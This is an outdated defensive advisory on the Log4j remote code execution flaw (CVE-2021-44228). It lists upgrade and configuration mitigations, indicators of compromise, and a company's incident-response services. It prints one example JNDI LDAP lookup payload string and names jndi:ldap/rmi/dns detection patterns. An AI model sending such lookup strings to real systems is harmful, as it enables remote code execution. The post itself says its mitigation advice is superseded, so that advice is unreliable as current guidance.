fbpx

Critical vulnerability Log4j

IMPORTANT this blogpost is outdated, please see the following link for the latest mitegation.

Click here.

Summary

Apache log4j2-library version <2.15.0 is vulnerable to a Remote Code Execution (RCE) (CVSS-score: 10, CVE-2021-44228). If a specially crafted line of text, sent by an attacker, is logged by Log4j the payload inside is executed. Multiple mitigation options exist which include changing configuration parameters or removing classes from non-updated Log4j instances or updating to Log4j to version 2.15 or higher (which requires a restart of the application or system).

Background

The vulnerability exists due to the way Log4j handles Java Naming Directory Interface (JNDI) queries. In the context of the vulnerability these queries are “user provided input”, and malicious users abuse this pattern to load lookups or malware.

In some applications user input or user interaction is logged. You can abuse this logging to query certain protocols such as (Secure) Lightweight Directory Access Protocol (LDAP(S)), Remote Method Invocation (RMI) and Domain Name Service (DNS).

An example of such a query is:

${jdni:ldap://example.com/a}

These queries are found to be “nestable” and can be used to receive system information.

All systems and services using the Log4j library (ranging from versions 2.0-beta9 to 2.14.1) are vulnerable. Even systems and applications that are not directly connected to the internet (e.q. behind firewalls, proxies or loadbalancers) can be at risk due to the nature of the vulnerability.

Examples of applications and systems using Log4j include VMware, ElasticSearch, Atlassian products, Apache and Oracle.

Mitigation

We strongly advise to upgrade Log4j to version 2.15.0 or higher as soon as possible. Releases for Log4j can be found here.

If updating Log4j to version 2.15.0 or higher isn’t possible specific settings should be changed in order to prevent lookups that are abused by the vulnerability. To apply these settings a restart is required.

From version 2.10 one can edit the following settings to be true:

# Change this property to 'true'
log4j2.formatMsgNoLookups=true

# Additionally 
LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Alternatively, till version 2.10 the JndiLookup class can be removed:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

As last resort one could use firewall rulesets to check and drop incoming traffic containing the jndi lookup queries and block all outgoing LDAP and RMI traffic as temporary work around.

Indicators of Compromise

  1. Review apache logs for jndi:ldap, jndi:rmi or jndi:dns entries. These queries are potential uses of the vulnerability affecting log4j
  2. Scan /var/log (or on Windows Apache the applicable log folder such as [DriveLetter]:\\logs\) with applicable signatures matching these indicators
  3. Scan webservers for generic webshells and review outbound connections coming from webservers in your firewall

      Support by Ordina

      Ordina is proactively supporting clients in their efforts to mitigate the Log4j vulnerability and ensure their resilience.

      1. Identify: Ethical Hackers from our Red Team are able to identify the use of Log4j within application stacks and research whether the used version is vulnerable, therefor exposing the attack surface within your organization.
      2. Protect: Members of our Blue Team then proactively take measures, as mentioned above, to prevent the misuse of Log4j and minimize the impact of the vulnerability.
      3. Detect: Once the preventive measures are in place, our Blue Team shifts to detection mechanisms in order to detect ongoing attacks.
      4. Respond: Based on Indicators of Compromise and our detection mechanisms our Blue Team will assist in the case of successful compromise to ensure quick and effective containment of the attack.
      5. Recover: Our Security Strategy team evaluates the response process and incorporates the ‘lessons learned’ within your 0-day reaction processes to ensure your resilience towards future 0-days.

              If you require any assistance with identifying whether the vulnerability is existent in your IT-environment, remediation of the vulnerability or rapid response to an ongoing cyberattack please give us a call: 030 – 663 80 03 or send an e-mail to blueteam@ordina.nl.

              IMPORTANT this blogpost is outdated, please see the following link for the latest mitegation.

              Click here.

              References and sources

              https://www.infocyte.com/blog/2021/12/11/log4j-exploit-detection-cve-2021-44228/

              https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

              https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2

              https://www.ncsc.nl/actueel/nieuws/2021/december/12/kwetsbare-log4j-applicaties-en-te-nemen-stappen

              https://github.com/OllieJC/aws-log4j-mitigations

              https://github.com/YfryTchsGD/Log4jAttackSurface